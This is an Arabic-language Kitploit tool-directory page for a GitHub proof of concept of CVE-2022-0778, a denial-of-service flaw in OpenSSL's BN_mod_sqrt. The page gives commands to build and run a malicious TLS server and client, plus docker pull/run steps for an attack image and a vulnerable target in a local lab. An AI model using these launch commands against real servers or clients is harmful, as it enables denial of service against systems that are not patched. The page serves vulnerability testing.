Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-0778 — إثبات مفهوم لاستغلال CVE-2022-0778، وهي ثغرة رفض خدمة في دالة BN_mod_sqrt الخاصة بـ OpenSSL. يتضمن تطبيقات خادم وعميل خبيثة لتحفيز حلقات لا نهائية في اتصالات TLS/HTTPS القابلة للاستغلال. | Kitploit
أدوات/GitHubGitHub/yywing/cve-2022-0778
تحليل الثغرات الأمنيةالاستغلالأمن الويبأمن الشبكاتاختبار الاختراق
GitHubyywing/cve-2022-0778

cve-2022-0778

إثبات مفهوم لاستغلال CVE-2022-0778، وهي ثغرة رفض خدمة في دالة BN_mod_sqrt الخاصة بـ OpenSSL. يتضمن تطبيقات خادم وعميل خبيثة لتحفيز حلقات لا نهائية في اتصالات TLS/HTTPS القابلة للاستغلال.

عرض المستودع
952منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

cve-2022-0778

خادم خبيث

go run server/main.go --addr 127.0.0.1:12345

cd test && test_server.sh

docker stat

عميل خبيث

cd test && test_client.sh

go run client/main.go  --network tcp --addr 127.0.0.1:12345

docker stat

البناء

docker build -t cve-2022-0778 .

Docker Hub

# start vulned server
docker pull yywing/cve-2022-0778-target
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778-target python server.py
# attack
docker pull yywing/cve-2022-0778
docker run -it --rm --entrypoint badclient yywing/cve-2022-0778 --addr host.docker.internal:12345

# start bad server
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345
# use vulned client
docker run -it --rm yywing/cve-2022-0778-target python -c "import http.client;http.client.HTTPSConnection('host.docker.internal', 12345).request('GET', '/')"
# or
docker run -it --rm yywing/cve-2022-0778-target curl https://host.docker.internal:12345
تنزيل الأداة